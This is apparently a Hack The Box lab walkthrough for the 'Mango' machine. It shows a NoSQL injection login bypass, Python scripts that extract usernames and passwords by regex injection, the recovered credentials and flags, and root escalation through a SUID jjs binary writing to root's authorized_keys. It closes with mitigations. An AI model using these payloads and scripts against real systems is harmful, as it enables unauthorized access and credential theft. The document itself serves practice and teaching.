htb-writeups

Mango HTB Walkthrough

📋 Overview

Mango is a medium-difficulty Hack The Box machine that involves NoSQL injection, credential brute-forcing, and privilege escalation through JavaScript engine exploitation.

Difficulty: Medium
Points: 30
Operating System: Linux

---

🎯 Reconnaissance

Initial Enumeration

export target=10.129.229.185

Port Scan

sudo nmap -p- --min-rate 5000 -sT -vvv $target

Discovered Open Ports:

• 22 - SSH
• 80 - HTTP
• 443 - HTTPS

Service Version Detection

sudo nmap -p 22,80,443 -sC -sV -T4 $target

Key Discovery: The scan revealed staging-order.mango.htb as a virtual host.

Host Configuration

Add to /etc/hosts:

10.129.229.185 staging-order.mango.htb

---

🔍 Initial Access

Web Application Analysis

Visiting http://staging-order.mango.htb presents a login page. Traditional SQL injection attempts proved unsuccessful, leading to testing for NoSQL injection vulnerabilities.

NoSQL Injection Exploitation

Initial Bypass

Intercepting the login request in Burp Suite and modifying the parameters:

POST / HTTP/1.1
Host: staging-order.mango.htb
Content-Type: application/x-www-form-urlencoded

username[$ne]=admin&password[$ne]=password&login=login

This payload successfully bypassed authentication, revealing the application was vulnerable to NoSQL injection.

Username Enumeration

Python Script for Username Brute-Force:

import requests
import string
import sys

def brute_user(user_prefix=""):
    for char in string.ascii_letters + string.digits:
        payload = user_prefix + char
        sys.stdout.write(f"\r[+] Trying username: {payload}")
        sys.stdout.flush()
        
        response = requests.post(
            'http://staging-order.mango.htb/',
            data={
                'username[$regex]': f'^{payload}',
                'password[$ne]': 'password',
                'login': 'login'
            }
        )
        
        if "We just started farming" in response.text:
            print(f"\n[+] Found partial username: {payload}")
            brute_user(payload)
            return
    
    if user_prefix:
        print(f"\n[+] Complete username found: {user_prefix}")

if __name__ == "__main__":
    brute_user("")

Discovered Usernames:

• admin
• mango

Note:To bruteforce the usernames we are using the nosql injection I have just used the requests package and made a request to the website and with the payload ^{user_prefix+char} trying whether the username starts with a,b,c note that to get the username starting with m we need to call the function as brute_user(“m”) How did m appear as first letter is that we tested in burp the first character using sniper attack by using the payload as ^a,^b…^z the intruder sniper request is below

Password Extraction

Python Script for Password Brute-Force:

import requests
import string
import sys

def brute_pass(user, pass_prefix=""):
    found = False
    for char in string.ascii_letters + string.digits + string.punctuation:
        if char not in ['+', '.', '*', '?', '|', '\\']:
            payload = pass_prefix + char
            sys.stdout.write(f"\r[+] Trying password: {payload}")
            sys.stdout.flush()
            
            response = requests.post(
                'http://staging-order.mango.htb/',
                data={
                    'username': f'{user}',
                    'password[$regex]': f'^{payload}',
                    'login': 'login'
                }
            )
            
            if "We just started farming" in response.text:
                found = True
                brute_pass(user, payload)
                return
    
    if not found and pass_prefix:
        print(f"\n[+] For user: {user} Found password: {pass_prefix}")

if __name__ == "__main__":
    brute_pass("admin", "")
    brute_pass("mango", "")

Note:ignoring $ as it indicates the end char

Recovered Credentials:

• admin: t9KcS3>!0B#2
• mango: h3mXK8RhU~f{]f5H

---

🚀 Privilege Escalation

Initial Access

ssh mango@10.129.229.185

User Enumeration

Switch to admin user:

su - admin

Stabilize shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

User Flag

cat /home/admin/user.txt

User Flag: 79dfb8a4808a30feb7d431d5f4a36380

Privilege Escalation to Root

SUID Binary Discovery

find / -type f -user root -perm -4000 -ls 2>/dev/null

Key Finding: jjs (JavaScript engine) with SUID permissions owned by root.

GTFOBins Exploitation

Using jjs for file write operations:

echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw = new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-rsa AAAAB3NzaC1yc2E...");
fw.close();' | jjs

Root Access via SSH

ssh -i private_key root@10.129.229.185

Root Flag

cat /root/root.txt

Root Flag: 679984d14402f6b0e0dccf1c1fe7b9ab

---

🛡️ Mitigation Strategies

1. NoSQL Injection Prevention
   • Implement input validation and sanitization
   • Use parameterized queries
   • Apply proper authentication mechanisms
2. Privilege Management
   • Remove unnecessary SUID binaries
   • Implement principle of least privilege
   • Regular security audits of system permissions
3. Network Security
   • Restrict SSH key-based authentication
   • Implement network segmentation
   • Regular vulnerability assessments

---

📚 Lessons Learned

• NoSQL databases are not immune to injection attacks
• Credential brute-forcing through regex-based injection is effective
• SUID binaries present significant privilege escalation risks
• JavaScript engines with elevated privileges can be dangerous

---

🔗 References

• NoSQL Injection Prevention
• GTFOBins - jjs

---

This walkthrough is for educational purposes only. Always ensure you have proper authorization before testing security vulnerabilities.